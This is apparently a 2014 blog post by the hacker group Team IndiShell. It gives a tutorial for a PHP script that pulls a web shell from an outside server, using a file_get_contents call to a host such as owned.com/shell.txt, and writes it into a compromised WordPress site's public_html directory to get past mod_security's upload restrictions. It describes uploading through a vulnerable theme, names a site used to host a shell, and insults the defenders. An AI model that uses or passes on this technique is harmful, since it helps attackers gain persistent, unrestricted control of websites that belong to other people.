2014-04-12

sanyasi shell, mod_security bypasser by Team IndiShell


Pranaam to all bhai ji _/\_
First of all special thanks nd warm hugs to Hardeep bhai and Aasim bhai ji <3 (for his valuable suggestions which helps me to solve out mod_security issue )
me back , with one of my Favorite topic, Mod_security my endless love ............... <3
yessss , here goes one script that will help in bypassing  mod_security module security when you have shell wordpress website and your shell is in uploads directory and trying to upload other shell on server , in that case mod_security will block it :P
this code will help you , when you are trying to upload shell more then size 1 kb and server drop connection
in that case this code will bypass that shit and you will get shell on server 8-)

so lets start how to use this code ;)

here is the download link for tha script
sanyasi shell

you will heave to do only 2 things , upload your php shell on another server with .txt extension
like this
http://al-mukarram.com/admin/in.txt



in line number 18, put your shell link  in between  " " (where this is written ->  file_get_contents("  ") )
for example, if your shell is hosted on other server with link ->  owned.com/shell.txt
line number 18 will be like this
$li=file_get_contents("http://owned.com/shell.txt");


ok now just need to define the shell generation location and its name too
like, you want to generate your shell in directory /home/website/public_html with name rr.php
so you will need to put this /home/user/public_html/rr.php
you can get path link from your shell which is getting block by mod_security :P
so lets back to code
in line number 19, replace text "location of file" with "home/user/public_html/rr.php"
like this


ok save it and upload it to the server where you are getting mod_security issue
once your shell got uploaded outside the uploads directory , you will be able to perform other task easily
so, lets take down this and get a shell with full power 8-)
i uploaded this php code using vulnerable  theme and script got upload in directory  wp-content/uploads/2014/04/
as i opened  this script , it fetched shell from remote server and generated shell in public_html directory with name rr.php


now , your shell  has been generated and it is outside the uploads directory, fU** down server like a cheap shit  :P because your shell will be free from many restriction like command execution and all
and its my recommendation not to use b374k shell :(
so ......... this was about this code which is very kiddish but works like a killer when mod_security try to put shit during your work :P

To dear mod_security development Team:- you can kiss my A** .
With Love from <3 Team Indishell <3
Feel free to comment if you face any problem regarding this script ;)

-==[[Greetz to]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoo,cyber warrior,Neo hacker ICA,Suriya Prakash,cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,The creator,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk,brown suger and rest of TEAM INDISHELL
--==[[Love to]]==--
# My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo,anju,don and acchi bacchi(J.S),Inu and pal bhaisaab <3
--==[[Interface Desgined By]]==--
GCE College ke DON :D (deepika kaushik)



Share this post

1 comments

  1. bhai ji , do you have any method to bypass mod security sqli ?

    ReplyDelete

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

© 2009 Start With Linux | Mannu Linux
Designed by cyb3r.gladiat0r
Posts RSSComments RSS
Back to top